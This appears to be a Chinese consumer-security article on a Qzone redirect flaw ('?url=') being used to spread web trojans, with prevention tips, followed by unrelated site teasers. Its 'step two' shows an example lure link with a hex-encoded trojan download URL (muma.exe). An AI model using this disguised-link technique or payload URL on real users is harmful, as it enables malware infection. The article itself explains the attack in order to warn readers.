騰訊Qzone地址變木馬 成黑客利器
一、模擬黑客攻擊
這裡,我們首先來了解這個漏洞的具體情況。Qzone的跨站漏洞是網友無意中開啟類似“號碼?url=任意字母”時發現的,這時網頁顯示為一個框架網頁,中間為"無法開啟網頁"的空白頁面(如圖1);然而,當輸入類似“號碼?url=”的地址時卻可以正常顯示,這時url後的網址其實在幕後是載入的。那麼,Qzone的跨站漏洞又是如何被黑客作為木馬的媒介的呢?
Qzone預設載入的地址要小心 |
第一步:黑客需要對該地址進行喬裝改扮一番。比如:網頁木馬的url為""。黑客會使用URl加密技術來為木馬地址作掩護,常用的方法是把url地址轉換為16進位制,這裡以ASCII碼隨心換為例(如圖2)進行示範。
黑客常用URL偽裝器 |
第二步:黑客將Qzone的地址設定為"號碼?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"並在網頁上貼出Qzone的地址來引誘網友點選,使用者往往點選了該地址下載運行了木馬還矇在鼓裡。
二、如何防範Qzone攻擊
方法1:既然這一跨站漏洞這麼隱蔽,使用者感染的機率也不會低。我們需要如何來防範這一漏洞可能造成的危害呢?做到不感染病毒,未雨綢繆是最有效果的。因此,我們在訪問網友的Qzone前,要多長几個心眼,要觀察其網址的形式。
一般正常的Qzone的地址是"號碼"或者"http://號碼"形式的,如果出現"號碼?url="的地址就要謹慎了,Qzone也可能出現類似"號碼/?url=http%3A//_%23uin%3D號碼%26albumid%3D393029702%26photoid%3D"的地址,如果地址裡面完全沒有QQ的地址段,那麼為了防止下載執行網頁木馬,可以將url後的字元輸入到ASCII碼隨心換進行轉換(如果是像以上地址的格式,可以將%後的十六進位制字元逐個進行轉換來獲得完整地址),如果url指向可執行檔案就不能點選了。
方法2:為了防止系統被種植網頁木馬,還可以安裝防毒軟體和防火牆並需要開始實時檔案和網路監控,這樣即使下載了網頁木馬也會被清除。如果發現了可疑的Qzone地址要及時舉報,讓黑客成為過街老鼠,毫無藏身之處。
小結:Qzone的跨站漏洞被用來種植木馬具有受眾廣的特點,Qzone的地址經過加密化裝後,又有幾個人會仔細地進行甄別呢?因此,利用人們偷窺人家隱私空間的好奇心來傳播木馬是很有效果的。
其實,要防範Qzone地址在你的電腦種植木馬也不難,最簡單的方法就是隻點選QQ資料裡的Qzone地址,不去其他網站點選就可以了。另外,需要使用具有防範IE漏洞的安全工具和防毒軟體來查殺這類木馬的下載安裝,如:瑞星卡卡。攜帶木馬的Qzone地址一經發現要馬上通知網友,決不姑息,不讓其他人成為黑客的犧牲品。同時,每次Qzone提示升級我們也最好升級不用嫌麻煩而取消升級,以免被黑客利用其他未知的漏洞。
-
秋季天氣乾燥,適合多吃哪種水果?
支付寶莊園小課堂10月10日的問題是,秋季天氣乾燥,適合多吃哪種水果?如果你不清楚,可以看看文中的介紹。2023年螞蟻莊園10月10日莊園小課堂答案今天的問題是:秋季天氣乾燥,適合多吃哪種水果?答案是:梨答案解析:俗話說“一梨潤三秋”,梨的含水量較高,吃梨可以給身體補充水分...
-
度小滿金融正規合法嗎?利息高嗎?安全嗎?上徵信嗎?
度小滿金融作為一個綜合類金融服務平臺,小夥伴們可以根據自己的需求在上面理財,借貸等等,不過很多小夥伴擔心度小滿金融這個軟體正規嗎?安不安全呢?利息高不高呢?度小滿金融正規合法嗎?度小滿金融是正規合法的。度小滿受銀監會、監管部門監管,全部商品都依照管控規定嚴...
-
肯德基聯名三麗鷗新春玩具什麼時候開始?2024肯德基三麗鷗聯名多少錢?
馬上就要到新年啦,肯德基又有大動作啦,近日網上爆出了三麗鷗聯名肯德基的新春玩具,看起來真的是很喜慶,那大家知道這次的肯德基聯名三麗鷗新春玩具的相關資訊。肯德基聯名三麗鷗新春玩具什麼時候開始?1月26號。這次的肯德基聯名三麗鷗新春玩具將於1月26號開始,這次聯...
-
猜一猜:貓咪睡覺時,有可能像人類一樣做夢嗎?
支付寶莊園小課堂4月11日的問題是,猜一猜:貓咪睡覺時,有可能像人類一樣做夢嗎?如果你不清楚,可以看看文中的介紹。2024年螞蟻莊園4月11日莊園小課堂答案今天的問題是:猜一猜:貓咪睡覺時,有可能像人類一樣做夢嗎?答案是:真有可能哦答案解析:研究表明,貓也會做夢。因為和人...